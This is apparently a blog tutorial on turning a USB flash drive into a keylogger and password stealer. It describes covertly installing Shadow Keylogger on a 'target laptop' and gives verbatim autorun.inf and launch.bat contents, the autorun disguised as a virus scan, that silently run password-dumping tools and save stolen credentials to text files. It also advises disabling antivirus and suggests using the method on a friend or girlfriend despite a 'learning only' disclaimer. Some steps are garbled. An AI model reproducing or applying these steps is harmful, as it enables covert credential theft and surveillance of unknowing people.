Blogmagz.com - How to make a USB keylogger. Keylogger is a computer device such as hardware or software used to monitor keyboard keystroke. This keylogger will usually save the keyboard monitoring buttons into log files, notes or recording.
Some very sophisticated keyloggers can even send results to a periodic creator email address (Wikipedia). So this keylogger is a program that can steal account data such as a username and password by recording the victim keyboard button.
Tricks to make a flash drive to keylogger
1. Create Flash Keylogger (Shadow Keylogger)
To create a keylogger on your flash drive, you need a Shadow Keylogger application. You can get it in the link below. HERE
If you have finished downloading then you put the file on the flashdisk or you can create a new folder. How to use the application as below:
- Insert your flash drive to the target laptop.
- Run Shadow Keylogger File File
- Enter the password and confirm
- Option click the button, then change the "Show the results of the password typed on the keyboard" become "prompt for a password after the OS icon is clicked in the system tray"
- You can choose many icons that will appear on the taskbar in the icon menu
- Then Pili "stores record data to one file on this computer"
- Then select the folder where you will save it.
NOTE : Pay close attention because the data stored in a folder that you have specified contains data that has been recorded by the software.
- Then check the notes and save the screen activity.
- Select the folder to save the file in the screenshot.
- This application can adjust itself how many minutes the screens will be saved by setting the level.
- You can also customize image quality in image quality. And click OK.
See the results of the Shadow Keylogger application
A. You can open a folder on the flash that you have specified if you want to open the keylogger results in the form of Word files. Can directly open the file. As shown below:
B. You can open results in the application by clicking on the icon that has appeared and then entered the password. The results of the sample as shown below:
2. Create a flash keylogger (notepad)
Next, you can create a keylogger with notepad, you must install software or additional tools to help make a flashdisk hacking tool. There are five software that you have to download. Below we have provided it.
- First download all the tools above and install all the tools above on Flash, then don't forget to turn off the interim antivirus. Here are the steps to hack the toolkit on the USB drive.
Create a file in Notepad and and type the following text:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
- Then save it in Notepad and rename it to autorun.inf then copy the autorun.inf file into the Flashdisk.
- Create another Notepad file typing the text below:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
Save the file change it to Launch.bat, then copy the USB launch.bat file. And the keylogger rootkit has been successfully made and ready to use.
NOTE: This method will work on OS Windows 2000, XP, Vista and 7 and can also be used as a password recovery if there is a password stored on your computer.
How to use USB Keylogger as Hacking
If you have followed the guide above to use and see the results of your hacking, do it as below:
- Insert the USB there will be an autorun pop-up window that appears. (This is because it has made autorun on flash).
- And now a password hacking tool runs in the background of the screen. This process doesn't take long. Passwords will be found and then stored in the TXT file.
- Finally, delete Flash and we will be able to see the password stored in the TXT file format.
How easy is that? The method we share here is only for learning. Please don't use it as a crime. You can do this method to work on your friend or girlfriend! We have also made articles about Keyloggers, if you are interested in reading it, click the link below.
Thus the article on how to make a flashdisk as a keylogger might be useful. Thank you!